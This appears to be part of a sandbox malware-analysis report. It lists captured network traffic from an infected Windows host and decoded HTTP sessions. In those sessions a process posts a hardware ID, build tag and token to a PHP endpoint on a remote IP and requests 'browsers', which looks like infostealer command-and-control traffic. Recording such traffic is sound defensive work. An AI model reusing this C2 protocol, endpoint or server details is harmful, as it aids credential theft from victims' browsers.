Jun 8, 2024 20:22:07.689625978 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.689647913 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.689666986 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.729044914 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.734069109 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.977200031 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.977236032 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.977272987 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.977310896 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.977344990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.977379084 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.977411985 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.977464914 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.977484941 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.977484941 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.977484941 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.977497101 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.977533102 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.977533102 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.977535009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.977545977 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.977569103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.977585077 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.977607965 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.977617025 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.977641106 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.977685928 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.977690935 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.977736950 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.977750063 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.977788925 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.977807045 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.977855921 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.977890015 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.977900028 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.977932930 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.977941990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.977976084 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.977984905 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.978018999 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.978029013 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978071928 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.978081942 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978115082 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978126049 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.978147984 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978159904 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.978179932 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978212118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978224993 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.978245974 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978257895 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.978297949 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.978301048 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978342056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978374004 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978389978 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.978406906 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978418112 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.978451967 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.978458881 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978492975 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978499889 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.978527069 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978533030 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.978576899 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978609085 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978624105 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.978656054 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.978661060 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978694916 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978728056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978738070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.978768110 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.978777885 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978811026 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978820086 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.978843927 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978853941 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.978878975 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978883982 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.978914022 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978923082 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.978946924 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978979111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.978992939 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.979012012 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979023933 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.979047060 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979057074 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.979082108 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979099035 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.979114056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979132891 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.979147911 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979152918 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.979183912 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979195118 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.979218960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979224920 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.979252100 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979288101 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979298115 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.979322910 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979329109 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.979357004 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979362965 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.979391098 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979399920 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.979424953 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979434013 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.979460001 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979494095 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979506016 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.979526997 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979537964 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.979562998 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979577065 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.979597092 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979630947 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979640961 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.979665041 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979676962 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.979700089 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979708910 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.979728937 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979743004 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.979762077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979768991 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.979795933 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979804039 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.979829073 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.979872942 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.979895115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.980720043 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:08.621871948 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:08.621962070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:08.682152987 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:08.682238102 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:08.939122915 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:08.939210892 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:08.993001938 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:08.998085022 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.244756937 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.244817972 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.244875908 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.244913101 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.245074987 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.245074987 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.248034954 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.253264904 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.499464035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.499550104 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.515463114 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.520454884 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.768166065 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.768269062 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.847440004 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.847548962 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.852818966 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.852859974 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.852906942 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.852920055 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.852951050 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.853147030 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.857897997 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.858078003 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.858418941 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.858458996 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.858489990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.858519077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.858546972 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.858575106 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.858692884 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.863315105 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.863565922 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.863784075 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.863856077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.863887072 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.863914967 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.863944054 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.863961935 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.864022970 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.864051104 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.864129066 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.864150047 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.864222050 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.869223118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.869267941 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.869311094 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.869354010 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.869431973 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.869525909 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.875019073 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.875061989 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.875092030 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.875096083 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.875127077 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.875148058 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.875149012 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.875180006 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.875206947 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.875207901 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.875231028 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.875238895 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.875268936 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.875271082 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.875297070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.875299931 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.875318050 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.875359058 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.875360966 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.875390053 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.875418901 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.875441074 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.875447035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.875475883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.875504017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.875505924 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.875533104 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.875561953 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.875581980 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.875602007 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.881493092 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.881536007 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.881565094 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.881593943 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.881623030 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.881652117 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.881685972 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.881731033 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.881731033 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.881731033 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.881783009 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.881942987 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.881973028 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.882006884 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.882020950 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.882036924 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.882047892 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.882067919 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.882106066 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:09.882123947 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.882153988 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.882180929 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.882230997 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.887218952 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.887262106 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.887294054 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.887352943 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.887382984 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.887433052 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.887461901 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.887490988 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.887518883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.887571096 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.887599945 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:09.887628078 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:10.488284111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:10.488570929 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:10.542860031 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:10.547955036 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:10.798376083 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:10.798468113 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:12.711992979 CEST	49731	80	192.168.2.4	23.88.106.134

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 8, 2024 20:22:19.646400928 CEST	53	65147	1.1.1.1	192.168.2.4

HTTP Request Dependency Graph

23.88.106.134

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	23.88.106.134	80	7596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 20:21:58.692256927 CEST	413	OUT	POST /6a9f8e2503d99c04.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJEGIJEGDBFHDGCAFCAE Host: 23.88.106.134 Content-Length: 213 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 31 39 36 30 37 37 37 34 43 43 36 36 31 31 37 39 33 34 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 63 75 61 70 66 73 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 2d 2d 0d 0a Data Ascii: ------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="hwid"8C19607774CC661179348------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="build"cuapfss------JJEGIJEGDBFHDGCAFCAE--
Jun 8, 2024 20:21:59.553096056 CEST	351	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:21:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 156 Connection: keep-alive Vary: Accept-Encoding Data Raw: 4e 32 45 30 4f 54 46 6b 5a 57 49 35 4d 6d 4a 6a 4e 47 45 79 4d 44 63 34 59 54 42 6a 4d 6a 56 69 59 57 4a 69 59 54 4d 31 59 6a 42 68 5a 6a 46 6d 4e 32 4d 35 59 57 5a 6a 4e 54 45 7a 5a 54 51 7a 4d 44 51 35 59 54 49 30 59 7a 52 6d 4f 47 45 31 4e 6d 5a 6d 4d 6a 52 6d 59 6a 67 32 59 54 42 69 66 47 70 69 5a 48 52 68 61 57 70 76 64 6d 64 38 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d Data Ascii: N2E0OTFkZWI5MmJjNGEyMDc4YTBjMjViYWJiYTM1YjBhZjFmN2M5YWZjNTEzZTQzMDQ5YTI0YzRmOGE1NmZmMjRmYjg2YTBifGpiZHRhaWpvdmd8ZWltZWhydnpvZC5maWxlfDF8MHwxfDF8MXwxfDF8MXw=
Jun 8, 2024 20:21:59.555145979 CEST	468	OUT	POST /6a9f8e2503d99c04.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDGHJEBFBFHIIECAECGH Host: 23.88.106.134 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 47 48 4a 45 42 46 42 46 48 49 49 45 43 41 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 48 4a 45 42 46 42 46 48 49 49 45 43 41 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 48 4a 45 42 46 42 46 48 49 49 45 43 41 45 43 47 48 2d 2d 0d 0a Data Ascii: ------HDGHJEBFBFHIIECAECGHContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------HDGHJEBFBFHIIECAECGHContent-Disposition: form-data; name="message"browsers------HDGHJEBFBFHIIECAECGH--
